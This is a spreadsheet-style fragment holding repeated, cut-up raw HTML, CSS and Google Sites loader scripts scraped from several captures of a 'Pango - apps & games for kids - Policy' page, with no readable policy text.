    <t>not(.TYR86d):first-child:before{border-bottom-style: solid; border-bottom-width: 8px; border-color: rgba(251,208,5,1); margin-left: auto; margin-right: auto; width: 100px; display: block;}.LB7kq .JYVBee{font-size: 21pt;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 38pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 17pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 19pt;}}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 45px; padding-top: 45px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 40px; padding-top: 40px;}}.SBrW1{height: 480px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 480px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 200px; padding-bottom: 40px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe .duRjpb{color: rgba(0,0,0,1); font-size: 36pt;}.gk8rDe .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.gk8rDe .duRjpb: not(.TYR86d):first-child:before{border-bottom-width: 6px; border-color: rgba(0,0,0,1); display: block;}.gk8rDe .JYVBee{color: rgba(33,33,33,1); margin-top: 13px;}.gk8rDe .aHM7ed{color: rgba(33,33,33,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 25pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 31pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-right-style: solid; border-right-width: 1px; font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 62px;}}.TlfmSc{font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.PsKE7e{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.58;}.hDrhEe{padding-bottom: 8px; padding-top: 8px;}.dhtgD:hover{text-decoration: underline;}.Zjiec:before{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(0,0,0,1); margin-bottom: 30px; margin-left: auto; margin-right: auto; width: 212px; display: block;}.rgLkl{background-color: rgba(158,158,158,1);}.zDUgLc{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1); opacity: 1;}.QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px; line-height: 22px;}.KjwKmc:hover{background-color: rgba(251,208,5,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom : hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom : hover{background-color: rgba(251,208,5,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height:</t>
  </si>
  <si>
    <t>22px;}.tpmmCb .KjwKmc: hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .KjwKmc:hover{background-color: rgba(251,208,5,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf</t>
  </si>
  <si>
    <t>.KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.CMArNe{background-color: rgba(255,250,230,1);}.TMjjoe{font-family: Roboto, sans-serif; font-size: 9pt; line-height: 1.2; margin-top: 0px;}.GBy4H .zDUgLc{border-bottom-width: 0px;}.GBy4H .TlfmSc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb{color: rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .wgxiMe{background-color: rgba(0,0,0,1);}.GBy4H .qV4dIc{color: rgba(255,255,255,0.8700000048);}.GBy4H .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec{color: rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec: before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .PsKE7e{color: rgba(255,255,255,0.8700000048);}.GBy4H .lhZOrc.</t>
  </si>
  <si>
    <t>PsKE7e{color: rgba(255,255,255,1);}.GBy4H .aJHbb:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color: rgba(255,255,255,0.8700000048);}.fOU46b .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.zDUgLc{border-bottom-width: 0px; opacity: 1;}.fOU46b .GBy4H .TlfmSc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.YTv4We{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H .Mz8gvb{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .GBy4H .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .M9vuGd{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec: before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H .PsKE7e{color</t>
  </si>
  <si>
    <t>: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .lhZOrc. PsKE7e{color: rgba(255,255,255,1);}.fOU46b .GBy4H .aJHbb</t>
  </si>
  <si>
    <t>: hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe :</t>
  </si>
  <si>
    <t>hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .M9vuGd :</t>
  </si>
  <si>
    <t>hover{color: rgba(255,255,255,1);}.fOU46b .LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.fOU46b .LBrwzc .zDUgLc{opacity: 1; border-bottom-style: none;}.fOU46b .LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-bottom-style: none;}.LBrwzc .TlfmSc{color: rgba(33,33,33,1);}.LBrwzc .YTv4We{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-color: rgba(204,204,204,1); border-bottom-style: solid; border-bottom-width: 1px;}.LBrwzc .tCHXDc{color: rgba(106,106,106,1);}.LBrwzc .iWs3gf.chg4Jd: focus{background-color: rgba(106,106,106,0.1199999973);}.LBrwzc .qV4dIc{color: rgba(106,106,106,1);}.LBrwzc .M9vuGd{color: rgba(33,33,33,1);}.LBrwzc .Zjiec{color: rgba(33,33,33,1);}.LBrwzc .Zjiec:</t>
  </si>
  <si>
    <t>before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .IKA38e{color: rgba(106,106,106,1);}.LBrwzc .lhZOrc. IKA38e{color: rgba(33,33,33,1);}.LBrwzc .eBSUbc{color: rgba(106,106,106,1);}.LBrwzc .hDrhEe:hover{color: rgba(33,33,33,1);}.LBrwzc .jgXgSe:hover{color: rgba(33,33,33,1);}.LBrwzc .M9vuGd:hover{color: rgba(33,33,33,1);}.QcmuFb{padding-left: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200px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 23pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 13pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media</t>
  </si>
  <si>
    <t>only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL2QrQ39gGwoEJH4zFzYI-YrfbKjsXpLjeOgasU4tE8v9jacv6IDB62FDESmEVFTHuW7WoyL",1,"CMbFruK4pf4CFcLJSgAdaTcAHw",1681340316230337,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823162,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347752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1581680775-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[1681340316239,"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t>
  </si>
  <si>
    <t>[]; window.addEventListener &amp;&amp; window.addEventListener('message', function(e) {if (window.messages &amp;&amp; e.data &amp;&amp; e.data.magic == 'SHIC') {window.messages.push(e);}});&lt;/script&gt;&lt;script src="https://apis.google.com/js/client.js?onload=gapiLoaded" nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;&lt;/script&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;const imageUrl =  null ;
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&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1LI-0V-WNXgMZQVYLY9RGLnI59_43b1JYpcWFoGwgN6kw3XUV-RPxM0HyST1AjziWeFivk","je":1,"sstu":1681340316425038,"si":"CNO2uuK4pf4CFTTISgAdF8sEzw","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5758824,5760348,5760827,5762259,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,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50263472,50266230,50291080,50313182,50322323,50347762,50455851,50468101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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;&lt;style nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="dEa8YtYCfbGPC5pcYthsMQ"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color:</t>
  </si>
  <si>
    <t>nonce="VmO0Jw91gK1X79S3k58h7g"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1LI-0V-WNXgMZQVYLY9RGLnI59_43b1JYpcWFoGwgN6kw3XUV-RPxM0HyST1AjziWeFivk",1,"CNO2uuK4pf4CFTTISgAdF8sEzw",1681340316425038,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5758824,5760348,5760827,5762259,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,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50263472,50266230,50291080,50313182,50322323,50347762,50455851,50468101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1062058744-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[1681340316435,"atari_2023.14-Tue-0500_RC00","521729938",null,1,1,""],null,null,null,null,0,null,null,0,null,null,null,null,null,null,null,null,20,500,"https://domains.google.com",null,0,null,null,null,null,null,null,null,null,null,null,null,0,null,null,null,0,null,null,null,null,null,1,1,0,0,0,0,0,0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nonce="VmO0Jw91gK1X79S3k58h7g"&gt;&lt;/script&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="VmO0Jw91gK1X79S3k58h7g"&gt;const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t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&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2SpYH42MS-AyqlrX_QfGF1_va4AUW9_rwVHsWTx99p0AbLjNNDHle7l3CERkru8RN-UZN8","je":1,"sstu":1681340316601036,"si":"CNCVxeK4pf4CFRZ0TwodfokIFQ","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747261,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49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50320300,50322323,50347762,50455851,50468101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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;&lt;style nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="85AF9WCyN_3VTVl9yrKiUg"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color:</t>
  </si>
  <si>
    <t>767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL2SpYH42MS-AyqlrX_QfGF1_va4AUW9_rwVHsWTx99p0AbLjNNDHle7l3CERkru8RN-UZN8",1,"CNCVxeK4pf4CFRZ0TwodfokIFQ",1681340316601036,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747261,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49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50320300,50322323,50347762,50455851,50468101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1795528486-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[1681340316609,"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nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;&lt;/script&gt;&lt;script nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script</t>
  </si>
  <si>
    <t>nonce="jsm1aOa_ojAF6cZX32L7FQ"&gt;const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t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&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1VYeyjQAONX4h6Gf-FhDooNXFeXRhrnVn_3Sj3lpCuRivhjmGQ2dPERse-iGjNkDfo577T","je":1,"sstu":1681340316801042,"si":"CPOu0eK4pf4CFaXBSgAdwQMHPg","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,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49703408,49765382,49816165,49822929,49823172,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455851,50468091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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;&lt;style nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="4svrr8IuzdMFz1MFzsNwUA"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color:</t>
  </si>
  <si>
    <t>nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1VYeyjQAONX4h6Gf-FhDooNXFeXRhrnVn_3Sj3lpCuRivhjmGQ2dPERse-iGjNkDfo577T",1,"CPOu0eK4pf4CFaXBSgAdwQMHPg",1681340316801042,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,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49703408,49765382,49816165,49822929,49823172,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455851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517048487-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[1681340316813,"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nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;&lt;/script&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="-7SAE8QT9jfZJuUb9GCVXQ"&gt;const imageUrl =  null ;
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="WGI2oMSJrN7Yezbf3gniJw"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="WGI2oMSJrN7Yezbf3gniJw"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script 